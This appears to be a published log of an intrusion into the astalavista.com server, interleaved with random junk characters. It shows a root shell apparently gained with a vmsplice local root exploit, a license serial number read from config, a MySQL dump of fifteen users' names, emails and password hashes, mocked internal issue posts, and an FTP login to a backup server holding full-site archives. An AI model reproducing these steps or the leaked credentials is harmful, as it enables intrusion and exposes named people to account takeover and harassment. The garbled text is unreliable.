" D6 S) G+ k( t$ m6 X5 w) }drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
5 _( v, h, v& F6 ?# W/ l/ ]-rw——- 1 com com 21880 Jun 2 08:07 .bash_history$ r% I v# j9 Z, |
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout( }& x2 `9 w0 c# S6 C1 H+ u8 B5 M
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
0 N# {* Y# W; r- H7 o+ @-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc3 i+ n, L' `6 r9 y' O' M
drwx–x–x 3 com com 4096 Jan 29 2008 domains2 J4 J/ q9 u- a8 B3 P
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed. ]# I% T0 f" Q* Y: v# C. ]
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
! q2 r# m. P9 w4 l-rw——- 1 com com 69 Nov 18 2008 .lesshst0 n! U" w* Z# k
drwx—— 2 com com 4096 Sep 24 2007 mail
. C& }! f( e9 v-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
2 M$ E, M9 C9 ~ udrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
- p8 b+ O- b+ P1 vlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html8 R; ?$ _6 s* J7 \9 t
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
* Y2 b' e, H: p6 }3 Tdrwx—— 2 com com 4096 Aug 26 2008 .ssh
- V" ]" q9 r; \6 o& M' m-rwx—— 1 com com 8515 Feb 10 2008 t' `1 f: }( g/ M) n
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c0 |4 h, F1 Y7 j6 a4 _
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp& c5 l" v! h6 E5 M; h; @
-rw-rw-r– 1 com com 617 May 20 2008 .toprc; G1 L, b! o0 l D( l5 G7 ~. {
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql9 _: ]* f5 j+ S
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo9 H7 @/ l* X6 p( _
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
: I3 Y- r" J8 j, }5 I# Z- m3 U0 R0 o5 }8 w; S' I" M
sh-3.2# head t.c
$ i7 ?9 _: w% t3 B; }/** y. t# M) R {3 u( z* I& ?
* jessica_biel_naked_in_my_bed.c$ T+ N; v2 y, Y& H1 |3 }
*0 e$ d6 Z9 G* V7 _) s5 s, n! K4 R
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.% Z! _$ o1 W% r- }0 ]
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
2 |) N9 @7 l! o* Stejnak je to stare jak cyp a aj jakesyk rozbite.
4 p+ A7 a/ {( g*
- c! T/ g$ h+ l( k; Z, e* Linux vmsplice Local Root Exploit
9 `& b j% y n- b0 z& m* By qaaz
$ z; u3 x- n V7 p# B*
* x! J% ]7 n% I8 l) b4 e; a0 {: K1 q' t1 @
sh-3.2# cd /
2 c' I4 |5 k0 z/ ]4 Lsh-3.2# ls -la, k( a1 I+ j+ ~6 f
total 360
V* z, ^6 T7 t$ \) L; I6 Ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 .; G/ m& ]1 Q/ q7 F% f! x
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
) _6 Q0 c0 n8 z. H* e: z-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
; m1 k. t8 h# Q/ ~-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
: ]' k# g- ?" N2 B0 T5 B-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db+ ]! P4 h( X$ |/ S: B$ `+ Y |1 W
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
c5 n7 i% t, C0 u5 b( B0 G% p6 f-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
/ {4 D7 C) n8 I" ?7 z; H3 ^4 Cdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup- K# h- F) L- j6 U( |- ?6 G( f
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
! J8 e& @' G7 U$ u! Ndrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
5 F, b: k7 q% edrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev- Y( X, B: X5 I/ m) {
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc$ X! e! h8 }) ]( W- e2 `6 W
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home( m2 c) M1 Q0 ?" o+ ~% y
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf9 D0 k& s+ K% |' F0 d' K- Q. [! ]
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib# r) m# ^8 F- [, {7 ~% G4 |* l
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
2 s0 v8 O! W1 n$ |0 {drwx—— 2 root root 16384 Sep 11 2007 lost+found
' D6 s. B2 s4 tdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
$ L' n4 A: @7 @' C3 e# L: Kdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
( ?1 @. I1 x. u9 K. }) wdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
& N, H, ^$ H4 { k5 T4 R8 ]: b; _-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
, }7 S3 S( q$ e1 V. a0 ndrwxr-xr-x 2 root root 0 Jun 3 02:43 net+ V+ v9 b- A- R3 u
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt1 Z; e* g- W$ E- N9 L
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc8 W( z# S2 G6 f% ~
drwxr-x— 15 root root 4096 Jun 4 08:40 root
]# a3 r& E# j$ v. Kdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin! u) l& p( |/ }1 _1 ~ m) Y
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux' E) G+ J; r4 `2 s. h3 |* P3 g
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
, k/ K! N$ x5 N8 A8 w H5 d5 Gdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
) U7 R* ]$ b5 W. J& ^1 B& {drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
5 `0 ~' A- a% n- P0 b) hdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
6 k; w3 D! E( [/ G' [4 {" xdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var2 c0 `9 @: L# T2 a* w
, m- P0 z- c" Y8 [8 R# R5 c! `4 F
sh-3.2# cd opt
' f; C2 ?$ T- {: r2 n9 t$ e) d6 w, [sh-3.2# ls -la
$ D. h9 ?+ l0 B8 Ftotal 20$ M% `& G+ b( T1 B# Q
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
% X* [ e z! adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ ?5 ^* t2 o$ U6 A5 ~. a$ x
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws: |! p2 c+ S q- `
F5 q) ?$ k! i3 ] x" X: Ssh-3.2# cd lsws/
' s1 p7 a8 f; Q, Z% Psh-3.2# ls -la
8 N9 C! l8 w" L H0 {7 Z$ ?total 1087 r% r0 G5 i! h
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
- i8 Z5 o4 z6 e* fdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
; z3 T R( C' a5 R r- hdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons# V* N2 d9 d; F' H" O
drwxr-xr-x 13 root root 4096 May 29 15:10 admin2 m$ l4 \( I8 O1 _
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate0 h4 Z$ i& b N: G& l3 w
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
! C1 x: D. N4 b2 j5 @5 d3 jdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
% C6 Y% y% A# p: S7 ~drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
; a' Q) o, w. u8 u3 Sdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs, V' H8 ~. [- d
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
0 K7 T5 Q* o5 j( x% y% `1 Xdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib6 j* h& ]: h6 M9 {" T+ A
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
! w( p+ z5 g" B+ B4 n m( ~-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
% C0 z! a% o1 `4 A, I-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
: s, u) {2 ?4 {! J-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP# | w; Y7 l0 e3 p! I
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
% S( p7 F3 g! y( T cdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
* K& X4 _' P2 w# Tdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild4 @3 N3 C- l4 n9 v |
drwxr-xr-x 3 root root 4096 Mar 20 2008 share! [" m7 m* y/ x
-rw-r–r– 1 root root 6 May 29 15:10 VERSION( O' u% w7 [; x
1 e" |% E5 }3 \* y
sh-3.2# cd conf8 c) T) Q" V5 m" l5 R7 \. V
sh-3.2# ls -la. e. o* @# d0 y4 g4 o
total 48
, u% @: |4 j( }% ~, Y3 g% |" D' ydrwx—— 4 apache apache 4096 Jun 3 02:43 .% ?# S; T) _# x6 Q5 z
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..: c* {/ {: Y# `1 l' b3 U5 }/ V
drwx—— 2 apache apache 4096 Mar 20 2008 cert5 w+ `$ \; Q- |' W# M
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml3 E% X4 [/ s3 ~; y8 k. f
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak( S/ H' ~" l3 D* M3 g
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last. y' x9 m1 {1 H4 M# n2 U
-rw——- 1 apache apache 256 May 29 15:10 license.key6 a2 D: }7 l7 t& ^0 s% t
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old5 h4 T% n2 V- h* ^0 y, o) c
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
) J o. s; L }-rw——- 1 apache apache 20 May 29 15:10 serial.no: }; X# ]4 N6 k) c% n! g0 I
drwx—— 2 apache apache 4096 Mar 20 2008 templates% B; r, l3 N1 c+ H; s
2 r" K8 L8 {; fsh-3.2# cat serial.no5 G& W# h$ J5 A9 j5 Z
IbDl-oVsO-CKqL-wVRa
7 ~2 E7 N5 v( Z3 D1 a4 u/ a" W
% i# q9 }3 y( I' z+ fsh-3.2# mysql
$ C3 b y {# |: L% }1 gWelcome to the MySQL monitor. Commands end with ; or \g.
9 y! W& l4 A- @( kYour MySQL connection id is 286844
# c4 m( U9 C/ C8 RServer version: 5.0.45-community-log MySQL Community Edition (GPL)
9 s. ?( W. i2 y# @2 G
: E, w$ {& D+ }& w+ vType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
g6 u8 q% x ]# s! D' | H$ Y& J
. G0 _6 g" G2 e7 |5 L4 Z# omysql> show databases;8 O. F8 p# t6 P7 s+ ^
+———————–+( s+ J8 b* J( o, a9 D$ I
| Database |
( Z0 P2 `- a( X1 z+ s+———————–+ F5 f7 N l2 |; Y1 Q7 b4 {+ ~3 z6 V
| information_schema |" z5 l" k. d, n& N( I
| astanet_ads |% t; B+ d7 V' n+ y7 p. p- l
| astanet_mailing_lists |3 O1 X- y H1 } Z" C. u3 P
| astanet_mediawiki |, j1 r6 L- G' U: h! t4 e f
| astanet_membersystem |
2 \6 [" t6 [( o# j8 u| com_contrexx |
6 [) e% T% h9 z| com_contrexx2 |
: b' I# U7 \, z a |0 Z3 I| com_contrexx2_live |$ S- a) Q/ \, a2 |+ v
| da_roundcube |: n, o) J" e) B
| dolphin |
5 b& w% U. a; p" j% B& o, t# _| ideapool |
4 y* L* ?- ^" e# @5 w& [# Z$ P| mysql |2 \0 i W8 A; C p6 G4 W7 q0 z
| test |1 F) w( B- \7 C3 p' A
| yourmaster |
( j# R! {) i7 h" a5 T( W, L+———————–+6 P% u7 |2 D) i, _
14 rows in set (0.00 sec)5 ]1 E; A3 l( x5 T5 x* z; O
. t( \) |4 V# h( o7 j" l3 z! N
mysql> use ideapool# O5 h* z1 U4 W* H/ c
Database changed
8 y, g* f+ q: mmysql> show tables;# ~' R' x/ y( k- y" K& R) t, Z
+———————————–+
0 m+ _# b2 F5 G% {' q/ o| Tables_in_ideapool |
# a& R# v1 B$ L, [8 }+———————————–+
* q% d4 z9 e9 E# H' @; F| eventum_columns_to_display |4 B" c- B1 H2 f9 n a
| eventum_custom_field |" }$ `8 t* K& G) X4 N7 [& Z
| eventum_custom_field_option |
7 c! @7 C$ [9 @5 x% V- ]| eventum_custom_filter |* D6 w( X- b3 l+ D! J) L6 d' ]* B
| eventum_customer_account_manager |8 E- U( H+ ]5 m" x" {+ [! U
| eventum_customer_note |; }& y" j$ _& ~; r
| eventum_email_account |
9 ~) ^, {9 t4 j; q3 N {| eventum_email_draft |# J( d% Y; _' L4 B
| eventum_email_draft_recipient |$ k/ F2 p: b2 \! K1 p6 c
| eventum_email_response |3 C% d" H X9 V+ S0 Z! v r1 G( s
| eventum_faq |
2 \3 X, x9 f' i- C( ]) l6 N! n& x| eventum_faq_support_level |, a6 @. v# X3 x' p Z
| eventum_group |2 @+ w! }2 w# ~3 I+ k
| eventum_history_type |% _! O5 J- `' y
| eventum_irc_notice |
% V: F7 R6 J+ s| eventum_issue |- Z" e/ T9 _2 ^ ~) A
| eventum_issue_association |
0 q1 V; J( V0 }! f3 N| eventum_issue_attachment |
' Q7 S" c; s% h9 J. _4 [* v| eventum_issue_attachment_file |4 t1 T+ y9 n$ D( [. K( T4 e8 p
| eventum_issue_checkin |
/ d$ N* u+ z$ [& l. M }( n| eventum_issue_custom_field |: a' _; t, {6 k
| eventum_issue_history |
6 e. z, X% p# A& o8 G| eventum_issue_quarantine |
. h [9 g6 h; |$ G| eventum_issue_requirement | n7 K A( x _4 v
| eventum_issue_user |
: \+ u& A5 g2 O/ L$ }$ u| eventum_issue_user_replier |' U- C; X) G$ i! E. W _
| eventum_link_filter |( o& \ S$ |; @8 k) a. V+ A
| eventum_mail_queue |& i. e! }* w) X
| eventum_mail_queue_log |
6 K) w( z7 y8 ~4 ?| eventum_news |
+ @# G, q. i, A| eventum_note |' S, r! f) L( A: m2 c! u* O3 Q( m; R6 h
| eventum_phone_support |6 \) v5 S# ]' U: C! E& q5 g
| eventum_project |0 M' B0 x/ z% p0 L% g6 H5 ] g
| eventum_project_category |
4 T" p& n7 x/ \ T3 A| eventum_project_custom_field |. ?& n: T0 n" i$ m
| eventum_project_email_response |5 e$ \4 L, N6 J/ U3 j# B, Q
| eventum_project_field_display |; w, j. S( f' z% F* G" h) {: b9 F& D
| eventum_project_group |; S8 R; o0 D4 I$ z2 t
| eventum_project_link_filter |
$ g0 w6 D! H8 K: T( A| eventum_project_news |% A6 i) G8 N5 q/ C
| eventum_project_phone_category |
/ |) W1 k1 P: j8 I| eventum_project_priority |
' J! y0 A+ U2 g+ n/ F1 ~# S9 N| eventum_project_release |! A- h& x9 T1 u4 w* O" E
| eventum_project_round_robin |
7 [5 V. g" ~6 ^) }8 p) S7 F% h| eventum_project_status |
) a- V" J( b/ }, b4 F8 Q9 H, Q+ [| eventum_project_status_date |& N; M! J9 @: g E/ W
| eventum_project_user |9 x8 n0 Y' i0 b4 x
| eventum_reminder_action |
5 R/ Z! m, n6 X4 n6 i| eventum_reminder_action_list |$ F" F. J; U0 y6 V% E
| eventum_reminder_action_type |. R9 x+ ?$ o8 Z5 A
| eventum_reminder_field |0 `0 L; P( P6 ]5 A
| eventum_reminder_history |
" ]) O$ j& D* n2 _. ]3 V, u| eventum_reminder_level |
" }8 @; A6 G3 ]7 E6 F| eventum_reminder_level_condition |
: `! q0 e' n& e. h, e9 z| eventum_reminder_operator |- @8 M3 E H; | @0 r3 @
| eventum_reminder_priority |
7 m' i/ y- ?7 M| eventum_reminder_requirement |
& Z; Z4 `$ f; h3 F8 O| eventum_reminder_triggered_action |% M x p* ]- s! C
| eventum_resolution |
3 P, `" I4 L2 R6 Q8 o5 H| eventum_round_robin_user |' i- M4 L$ F( Q( [, s; B& ~4 T) |% ~! i
| eventum_search_profile |: L4 Y: _4 o8 V
| eventum_status |. z4 U! v5 ]2 `$ o ?4 |) G
| eventum_subscription |
! |; ]- W/ f0 T% U/ @, ]| eventum_subscription_type |' z) H7 v K2 ]: ?
| eventum_support_email |5 d- y9 @# O) k
| eventum_support_email_body |
7 P; Y1 c: }1 v0 j3 i) ~7 u* A, X| eventum_time_tracking |
7 K7 j& m8 C% r% O0 j$ Q* m| eventum_time_tracking_category |
" x [1 J9 L( w% H0 u1 l9 D. B| eventum_user |
& o' F* e8 o7 \: u# @% ^3 D+———————————–+0 {. e% Q' ^4 B; B
69 rows in set (0.00 sec)
. L) H3 K4 n1 A/ i/ O: k& p! X
& p* S1 C& q6 l. omysql> describe eventum_user;- a2 o4 f* {, l( a9 u6 j
+————————-+——————+——+—–+———————+—————-+
5 U: S1 _8 f6 L+ D| Field | Type | Null | Key | Default | Extra |4 `: \0 K B/ {4 _$ g$ L0 ~
+————————-+——————+——+—–+———————+—————-+. G* E. d% `+ J$ [' c
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
9 z! d! O6 M, c| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
# U7 p1 p7 G2 E| usr_customer_id | int(11) unsigned | YES | | NULL | |
, I% R4 O$ C4 U) ~) w3 t4 E| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
3 f: E: l: I# r* c( S7 y% s, k3 `0 A| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
5 o) a1 {( m1 I& s8 Z| usr_status | varchar(8) | NO | | active | |
& J, B4 U5 E3 L. O# m* J| usr_password | varchar(32) | NO | | | |) ^$ I' x" ~* b2 @4 c X9 ?
| usr_full_name | varchar(255) | NO | | | |6 f; M) |6 s. U( \8 M" ? h0 k
| usr_email | varchar(255) | NO | UNI | | |/ c# p$ i1 x+ N( f. J( W
| usr_preferences | longtext | YES | | NULL | |3 Z' r" |- M+ H" \' ` _
| usr_sms_email | varchar(255) | YES | | NULL | |
5 C [; V1 }6 k8 ?' G- a| usr_clocked_in | tinyint(1) | YES | | 0 | |
( {/ U, E# }$ O3 g2 Z0 ~| usr_lang | varchar(5) | YES | | NULL | |
0 Q- t% s& B, _+————————-+——————+——+—–+———————+—————-+
; Q4 e" j+ c, i' x( G0 Y13 rows in set (0.00 sec)* v! l4 ^3 H) Y/ N' J* ?3 R/ m# G
! o' R0 m1 s7 Z! W7 {% @! ?9 t
mysql> select usr_full_name,usr_email,usr_password from eventum_user;* z9 a) x* _ K; _
+———————-+——————————-+———————————-+
* {0 }, {( h% u! [8 c| usr_full_name | usr_email | usr_password |( a. r; b k) m. w& J% r; Z
+———————-+——————————-+———————————-+2 [3 v p- H, F* ^, V8 X O3 i) P
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |$ z' N3 z( ^$ C/ B
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
" z% j/ t* y7 w. j| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |! |& Q1 g" V# x- p
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
; o9 G: Y% r) n7 \; ?0 e& x; b| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |# @" V2 L! B& e) Z q
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |* P4 ]% e, O6 T; Y( t1 F
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |9 r4 E* ~- E1 g. M3 Y
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
" Y& k( v4 R# G; F2 p| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |7 x V9 @2 C1 Z( N
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |+ U: R1 @1 d8 t5 ?2 \1 H1 H
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |0 G3 M3 L v# l, Q' E) |8 [
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |) Q3 i& Y( h* m0 p; X
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |" q9 W. Q% J3 {& ?0 I, B
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |3 }# S% h0 z. M: J
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
0 Y4 N/ C3 x) V3 a# P+———————-+——————————-+———————————-+
; c' U I# t( g7 M$ m' a5 E15 rows in set (0.00 sec)( t4 |$ K8 N1 Y" b( S' R0 y
5 a* C+ o8 }% ]* U- mmysql> select iss_description from eventum_issue where iss_id = 43;
8 ?0 _0 F: t, V7 s$ K6 ^& m" y3 }9 \+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% h! \$ p7 ` q ?2 n. M3 d8 v7 _( y| iss_description
7 ]/ \2 N! j) e e" k9 D q- ^/ ||8 E. |: U- h; l# ^- R6 E
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+" T& p+ T1 Y0 E$ o8 c0 X/ ]5 w
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be L4 E6 f, h8 k3 M1 D1 D' `" x, F: _* V4 w
connected for 90 mins… 120mins… so what i propose is something like:4 |4 W" N( p" s( D# Z7 }: n7 A
链接标记[url]http://www.surfthechannel.com/[/url]: ]6 Z) r5 s/ _2 [. G+ X) N0 o
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
0 e0 @( d; E9 U; p& Y9 ^like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t3 @4 ~* a, X" s5 C
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off; H3 D! ^ x2 W* ]: p
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
! k1 M0 }1 a! @2 |2 ^% n* f$ ^* ]( I4 h# [
We could also put advertisement during play on the flash video player itself… extra $$…+ U# j& I4 G9 u) |$ ^( s1 ^- ]. Z3 j
! p/ H- k1 P- u+ k
By sykadul |: G7 Y1 V2 e6 o$ a
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+/ L/ F7 g; e' G+ ]3 G5 a9 \1 _
1 row in set (0.00 sec)- G3 P! _# p4 ?* k t
; V% c- ^0 o# L" r3 e5 K6 g
// Money and extra $$ is all they care about. remember that.
3 z" z+ ~% @6 X e/ C4 A: W/ k. ^, y+ X; [5 u
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;, a, G+ S( z, H/ s! Y
+————————+——————————————————————————————————————————————————————————————————————————————-+
- l, ~: t, T: O; J| iss_summary | iss_description 2 x0 q6 m v: L: o& \8 F# ?
|
+ S" l z v+ u" @* u+————————+——————————————————————————————————————————————————————————————————————————————-+
0 }3 e: n3 c( a9 R| Forum for REAL EXPERTS | Hello,* Z6 Y8 M! S, O+ r5 E+ z: w" k- d7 |
" l+ l0 I. ~+ R- S% F( o. R
Ishtus and I,$ A; q% R4 X3 y( o, Z6 ]
2 b p/ Q6 I# e+ aCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide6 \8 e4 O* S0 @ r, Y7 H' x
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
' \& k1 W3 ] o& @
b2 v7 x3 G; i3 g5 HOne example a friend of mine from coresecurity.com!
# N8 I2 v1 Z# L! Q8 F- `* ^
8 k& a, ~/ y- ^( }9 x% j7 cWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..1 c" W/ ~3 @) `! X
, o6 O& `1 x! {$ a4 P& W
|3 L% C: Q& H9 d6 u$ G
+————————+——————————————————————————————————————————————————————————————————————————————+
8 i) u$ _) w/ ^0 `5 W1 row in set (0.00 sec)# X; u' m& n: t
% U! P$ k- Y5 m, f/ ~) f2 A
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…6 a" H% G+ l% a* C8 u6 R( l
8 D' @! Y8 q6 ~% p
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
8 G* y3 I& t9 P a+——————+———————————————————————————————+
- }& f( U+ ^0 h; p3 k9 `' n| iss_summary | iss_description |
% P8 g1 ?$ T9 D" F4 T" c: H+——————+———————————————————————————————+
Q5 o1 q L& k/ X+ G| Website guidance | Virtual Girl which guides you trought the website.
) r! F6 G+ ~+ B2 q/ \: n R
) [6 J8 Q7 R9 G1 h4 nWe need a girl with who you can ( talk )!!!
: ]1 s) I* ?$ x( E: r( a% uAlso for the News!6 m9 k$ p! e* r0 j' g- b6 ^- |
So my suggestion is a girl who read you the news loud if you like!: j5 z8 v" L6 X/ [) s8 Q$ _
you can choose between read yourselfe or she read it for you or both!
, G6 d+ a- k& n2 d0 |# V- n) d$ [0 V, o- x( [4 y& O
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
" C. ~& {% X4 ?8 k2 |, Q1 }
( S2 N: z5 i8 h: \Have a look on the example girls!!5 t- j. w( U5 F3 @1 E9 q7 |
2 a6 V6 X8 l0 y链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
9 F0 G( [# w( e* J
- k: k+ x, r7 `/ n2 tor that6 Y1 h+ m3 @; X& w$ G
( ^- ~1 O5 M* m2 e3 K6 I" g链接标记[url]http://www.yellostrom.de/[/url]3 {3 L; q" A v6 O; ]
/ S, C/ M9 G. u6 T Z, R
|' a" L- ~ B+ R7 P
+——————+———————————————————————————————+
6 o l" e c% q1 row in set (0.00 sec)- C( j8 Z4 v1 I4 W; @* e
* T3 F. }/ \$ k
// ha ha.0 \8 l% s' s5 @5 R% H, h8 {+ p
3 }( f! l1 |4 e+ `+ [' [2 M8 P0 @mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
6 m, f+ _% z4 K7 n+————————–+———————————————————————————————————–+
# J/ R1 ]# a1 ~2 A7 G; N4 B& K. O| iss_summary | iss_description |$ w4 Y. } ^ w! p: r& \
+————————–+———————————————————————————————————–+7 T- t+ e- P: N9 B
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
: D. Z3 r; d! R7 i, G+————————–+———————————————————————————————————–+
( h a T s5 m2 C6 S' G1 row in set (0.00 sec) P5 G2 v0 Y1 M( D1 S5 h! [3 e
' f0 c! X7 Y0 s' s
// LOL.
& j1 x9 s! W3 D1 [" _: w8 o# K; s$ @% B! u/ l
mysql> exit
& P" m# i' l- K. y3 YBye
2 A6 \$ ?% p- Z" F% [+ O* i7 C
+ `7 d1 P- X3 x# F5 r: @sh-3.2# ftp 212.254.194.163/ y9 b7 E& d. V- i
Connected to 212.254.194.163.
1 f; C ]/ ]/ H/ C6 X220 BackupCOM_VW FTP server ready.
' e! z$ W" ]* p! b504 AUTH: security mechanism ‘GSSAPI’ not supported.
* J6 [' U( k2 v' J" \* e! W504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
) q E9 C& F$ |* T. S( UKERBEROS_V4 rejected as an authentication type
: E" `8 r0 e) b$ pName (212.254.194.163:root): astalavista.com
# c/ x7 c, ?2 h$ I; ~* W0 _ P331 Password required for astalavista.com.8 w5 Y! M3 W5 |" g6 T. j8 r6 W
Password:
D* R: j9 J) I* @3 T9 D230 User astalavista.com logged in.
" } o- m% D# Z1 y' g( oRemote system type is UNIX.
- ^2 H& M( j( Y5 sUsing binary mode to transfer files.- a# c8 J# I* T. O
ftp> ls -la1 Q* L9 N1 F6 g1 |1 r
227 Entering Passive Mode (212,254,194,163,2,188)9 u5 f, S( x/ _- |
150 Opening BINARY mode data connection for ‘file list’.
8 O* x* s8 d5 A1 }, L' sdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
/ S5 ^. U9 z7 m; w- Q! u; x/ o226 Transfer complete.
. n! a G! S/ G' {ftp> cd astalavista.com" V2 h) t, [8 M7 y9 X; Q
250 CWD command successful.' Y7 ^. g9 c1 N, i7 T0 Q/ }
ftp> ls -la
( S7 e& L* S7 ]% A227 Entering Passive Mode (212,254,194,163,2,189)
0 X! u/ h m! j" R7 d+ o150 Opening BINARY mode data connection for ‘file list’.
X5 p* ]$ f* J6 \! n- H' e-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
. c1 z4 Q1 w. G# {/ B+ O% R) [. u-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
& S: ~) @* B' g7 z- x# `; p6 k-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2! K: m* @4 d# u& |* T) i) _
